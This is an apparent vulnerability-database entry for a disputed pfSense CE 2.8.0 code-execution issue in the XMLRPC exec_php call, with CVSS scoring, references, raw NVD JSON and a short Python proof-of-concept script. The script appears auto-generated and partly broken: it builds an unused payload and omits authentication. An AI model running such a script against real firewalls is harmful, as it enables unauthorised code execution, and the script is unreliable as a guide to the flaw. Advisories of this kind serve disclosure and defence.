CVE-2025-69691

Description

Netgate pfSense CE 2.8.0 allows code execution in the XMLRPC API via pfsense.exec_php. NOTE: the Supplier disputes this because the API call is only available to admins and they are intentionally allowed to execute PHP code.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Netgate pfSense CE 2.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
import xmlrpc.client

# CVE-2025-69691 PoC for Netgate pfSense CE
# Target: pfsense.exec_php via XMLRPC

target_url = "http://<TARGET_IP>/xmlrpc.php"
command = "phpinfo();" # Malicious PHP code to execute

try:
    # Create proxy connection
    proxy = xmlrpc.client.ServerProxy(target_url)
    
    # Prepare payload using the vulnerable method
    # Note: Authentication might be required depending on config, but exploit assumes PR:L context
    payload = {
        "pfsense.exec_php": [command]
    }
    
    print(f"[*] Sending payload to {target_url}")
    print(f"[*] Executing PHP code: {command}")
    
    # Send request
    response = proxy.call('pfsense.exec_php', command)
    
    print("[+] Response received:")
    print(response)
    
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69691
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69691
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69691/
[4] VulDB https://vuldb.com/cve/CVE-2025-69691
[5] https://seclists.org/fulldisclosure/2026/Feb/16
[6] https://www.linkedin.com/in/nelson-adhepeau/
[7] https://seclists.org/fulldisclosure/2026/Feb/16

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69691", "sourceIdentifier": "[email protected]", "published": "2026-05-08T07:16:28.880", "lastModified": "2026-05-08T22:16:28.813", "vulnStatus": "Undergoing Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "Netgate pfSense CE 2.8.0 allows code execution in the XMLRPC API via pfsense.exec_php. NOTE: the Supplier disputes this because the API call is only available to admins and they are intentionally allowed to execute PHP code."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-915"}]}], "references": [{"url": "https://seclists.org/fulldisclosure/2026/Feb/16", "source": "[email protected]"}, {"url": "https://www.linkedin.com/in/nelson-adhepeau/", "source": "[email protected]"}, {"url": "https://seclists.org/fulldisclosure/2026/Feb/16", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}